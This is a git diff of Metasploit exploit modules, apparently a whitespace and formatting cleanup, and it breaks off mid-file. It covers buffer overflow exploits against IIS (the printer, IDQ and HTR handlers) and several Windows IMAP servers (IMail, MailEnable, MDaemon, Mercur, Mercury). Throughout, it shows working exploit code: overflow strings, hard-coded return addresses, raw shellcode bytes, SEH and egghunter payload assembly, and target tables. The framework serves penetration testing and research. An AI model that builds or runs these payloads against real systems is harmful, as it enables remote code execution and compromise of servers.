+80,10 @@ class Metasploit3 < Msf::Exploit::Remote " sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src) - + sc.base_addr = target['Rets'][0] get_eip = sc.encode_string - + pat = Rex::Text.rand_text_alphanumeric(1016) pat[0, get_eip.length] = get_eip @@ -94,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote 'content-type' => 'application/x-www-form-urlencoded', 'data' => data, }, 5) - + handler end diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index 1ddb1497ce..4707c9b92f 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 5.0 Printer Host Header Overflow', 'Description' => %q{ - This exploits a buffer overflow in the request processor of + This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -40,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '2674'], [ 'MSB', 'MS01-023'], [ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'], - ], 'Privileged' => false, 'Payload' => @@ -48,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 900, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ - 'Windows 2000 English SP0-SP1', + [ + 'Windows 2000 English SP0-SP1', { 'Platform' => 'win', 'Ret' => 0x732c45f3, @@ -63,11 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'DisclosureDate' => 'May 1 2001', 'DefaultTarget' => 0)) - + register_options( [ Opt::RPORT(80) - ], self.class) + ], self.class) end @@ -76,40 +71,40 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if !(resp and resp =~ /Error in web printer/) return Exploit::CheckCode::Safe end - + connect sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n") resp = sock.get_once disconnect - - if (resp and resp =~ /locked out/) + + if (resp and resp =~ /locked out/) print_status("The IUSER account is locked out, we can't check") return Exploit::CheckCode::Detected end - + if (resp and resp.index("HTTP/1.1 500") >= 0) return Exploit::CheckCode::Vulnerable end - + return Exploit::CheckCode::Safe end - + def exploit connect - + buf = make_nops(280) buf[268, 4] = [target.ret].pack('V') - + # payload is at: [ebx + 96] + 256 + 64 buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96] buf << "\x80\xc1\x40" # add cl, 64 buf << "\x80\xc5\x01" # add ch, 1 - buf << "\xff\xe1" # jmp ecx - + buf << "\xff\xe1" # jmp ecx + sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n") handler diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 400c62dbaf..526d7ff18e 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow', 'Description' => %q{ - This module exploits a stack overflow in the IDQ ISAPI handler for + This module exploits a stack overflow in the IDQ ISAPI handler for Microsoft Index Server. }, 'Author' => [ 'MC' ], @@ -47,36 +45,35 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, - + 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ], [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ], ], 'DisclosureDate' => 'June 18 2001', 'DefaultTarget' => 0)) - - register_options([Opt::RPORT(80)], self.class) - + + register_options([Opt::RPORT(80)], self.class) end def exploit connect sploit = rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232) - sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] - sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" + sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4] + sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=" sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46) - uri = '/' + sploit + payload.encoded + uri = '/' + sploit + payload.encoded res = "GET #{uri}\r\n\r\n" print_status("Trying target #{target.name}...") sock.put(res) - + handler disconnect end diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 38c4025a74..707697717a 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS 4.0 .HTR Path Overflow', 'Description' => %q{ - This exploits a buffer overflow in the ISAPI ISM.DLL used to + This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being @@ -32,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters. - }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, @@ -44,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '307'], [ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'], [ 'MSB', 'MS02-018'], - ], 'Privileged' => true, 'Payload' => @@ -54,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT 4.0 SP3', {'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }], ['Windows NT 4.0 SP4', {'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }], @@ -62,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Apr 10 2002', 'DefaultTarget' => 0)) - + register_options( [ Opt::RPORT(80) @@ -75,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote buf = 'X' * target['Rets'][0] buf << [ target['Rets'][1] ].pack('V') buf << payload.encoded - + req = "GET /#{buf}.htr HTTP/1.0\r\n\r\n" print_status("Trying target #{target.name} with jmp eax at 0x%.8x..." % target['Rets'][1]) sock.put(req) diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 19bdd278d6..2e01659447 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -3,30 +3,27 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IMail IMAP4D Delete Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the 'DELETE' + This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14. - }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, @@ -36,10 +33,9 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], - ], 'Privileged' => true, - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, @@ -54,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote } }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # alphanum rets :(, will look more into it later ['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }], @@ -65,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - + print_status("Sending overflow string...") req = 'A683 DELETE ' req << payload.encoded @@ -84,15 +80,15 @@ class Metasploit3 < Msf::Exploit::Remote req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50" req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57" req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a" - + # Run off the stack, so we don't kill our payload, or something... req << rand_text_alphanumeric(600) - + # Terminate the request req << "\r\n" - + sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index d8a721e9a7..bb137587a2 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -3,30 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH - verb. By sending an overly long string, an attacker can overwrite the + This module exploits a stack overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH + verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. In order for this module to be successful, the IMAP user must have at least one - message. + message. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -46,35 +44,34 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 400, 'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c", - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ], - [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ] + [ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'July 18 2007')) - end - + def exploit - sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87) + sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87) sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">" - info = connect_login - + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put("a001 SELECT INBOX\r\n") sock.get_once(-1, 3) sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index fac2da1ac1..4e2bb0b22f 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow', 'Description' => %q{ - MailEnable's IMAP server contains a buffer overflow - vulnerability in the Login command. + MailEnable's IMAP server contains a buffer overflow + vulnerability in the Login command. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 450, @@ -47,33 +45,33 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MailEnable 2.35 Pro', { 'Ret' => 0x10049abb } ], #MEAISP.DLL ], 'DisclosureDate' => 'Dec 11 2006', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit connect - auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n" - sploit = rand_text_alpha_upper(556) + [target.ret].pack('V') + auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n" + sploit = rand_text_alpha_upper(556) + [target.ret].pack('V') sploit << payload.encoded + "\r\n\r\n" res = sock.recv(50) - if ( res =~ / OK IMAP4rev1/) + if ( res =~ / OK IMAP4rev1/) print_status("Trying target #{target.name}...") sock.put(auth) - sock.get_once(-1, 3) + sock.get_once(-1, 3) sock.put(sploit) else print_status("Not running IMAP4rev1...") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 36c6abf2c3..311b0adab2 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,14 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow', 'Description' => %q{ - MailEnable's IMAP server contains a buffer overflow + MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -38,13 +35,12 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '17844'], [ 'BID', '14243'], [ 'NSS', '19193'], - ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 450, @@ -52,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL ['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }], @@ -65,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - + seh = generate_seh_payload(target['Rets'][1]) buf = rand_text_alphanumeric(target['Rets'][0]) req = "a001 STATUS \".\x00" + buf + seh req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n" sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index ccb7e5492c..e367643548 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,23 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the W3C logging + This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected. - }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ - [ 'CVE', '2005-3155'], + [ 'CVE', '2005-3155'], [ 'OSVDB', '19842'], [ 'BID', '15006'], ], @@ -44,41 +41,40 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL ], 'DisclosureDate' => '', 'DefaultTarget' => 0)) end - + def check connect disconnect - + if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login - - buf = rand_text_alphanumeric(6196, payload_badchars) + + buf = rand_text_alphanumeric(6196, payload_badchars) seh = generate_seh_payload(target.ret) req = 'a01 SELECT ' + buf + seh + "\r\n" sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 7b7468ee64..4000262508 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the CRAM-MD5 + This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts. - }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, @@ -35,22 +32,20 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1520'], [ 'OSVDB', '11838'], [ 'BID', '11675'], - ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ], ], @@ -60,27 +55,27 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + print_status("Asking for CRAM-MD5 authentication...") sock.put("a001 authenticate cram-md5\r\n") res = sock.get_once - - + + print_status("Received CRAM-MD5 answer: #{res.chomp}") # Magic no return-address exploitation ninjaness! buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff" req = Rex::Text.encode_base64(buf) + "\r\n" sock.put(req) res = sock.get_once - + print_status("Received authentication reply: #{res.chomp}") print_status("Sending LOGOUT to close the thread and trigger an exception") sock.put("a002 LOGOUT\r\n") res = sock.get_once - + print_status("Received LOGOUT reply: #{res.chomp}") sleep(1) - + handler disconnect end diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 4425003686..6fd5da8f48 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MDaemon 9.6.4 IMAPD FETCH Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Alt-N MDaemon IMAP Server + This module exploits a stack overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli }, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a])", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MDaemon Version 9.6.4', { 'Ret' => 0x64dc118b } ], # p/p/r HashCash.dll ], diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index a6fdbc2a39..31aaf09e3b 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow', 'Description' => %q{ - Mercur v5.0 IMAP server is prone to a remotely exploitable - stack-based buffer overflow vulnerability. This issue is due - to a failure of the application to properly bounds check + Mercur v5.0 IMAP server is prone to a remotely exploitable + stack-based buffer overflow vulnerability. This issue is due + to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability. }, @@ -50,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 Server SP4 English', { 'Offset' => 126, 'Ret' => 0x13e50b42 }], ['Windows 2000 Pro SP1 English', { 'Offset' => 127, 'Ret' => 0x1446e242 }], @@ -59,22 +57,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 17 2006')) end - - def exploit - sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20" - sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset']) - sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) - sploit << payload.encoded + rand_text_alpha_upper(453) - info = connect_login - + def exploit + sploit = "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20" + sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset']) + sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) + sploit << payload.encoded + rand_text_alpha_upper(453) + + info = connect_login + if (info == true) print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret) sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index aea811d012..0b28ee6769 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Egghunter def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercur Messaging 2005 IMAP Login Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. + This module exploits a stack overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results. }, @@ -41,15 +39,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 228, 'BadChars' => "\x00\x20\x2c\x3a\x40", - 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ], @@ -57,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 17 2006', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit @@ -68,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote egg = hunter[1] sploit = "A001 LOGIN " + egg + egg + payload.encoded + hunter[0] - sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV') + sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV') print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 6e403e55fb..f7ca2b18e4 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury/32 <= 4.01b LOGIN Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Mercury/32 <= 4.01b IMAPD @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 800, @@ -47,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -55,7 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 6 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( + [ + Opt::RPORT(143) + ], self.class) end def check @@ -78,16 +79,16 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n" sock.put(sploit) sock.get_once - + sploit << rand_text_alpha_upper(255) sock.put(sploit) - sock.get_once + sock.get_once sploit << make_nops(5295 - payload.encoded.length) - sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) - sploit << make_nops(2) + [target.ret].pack('V') + sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + sploit << make_nops(2) + [target.ret].pack('V') sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750) - + print_status("Trying target #{target.name}...") sock.put(sploit) diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index d3cd6ceb4a..5356d03c55 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This 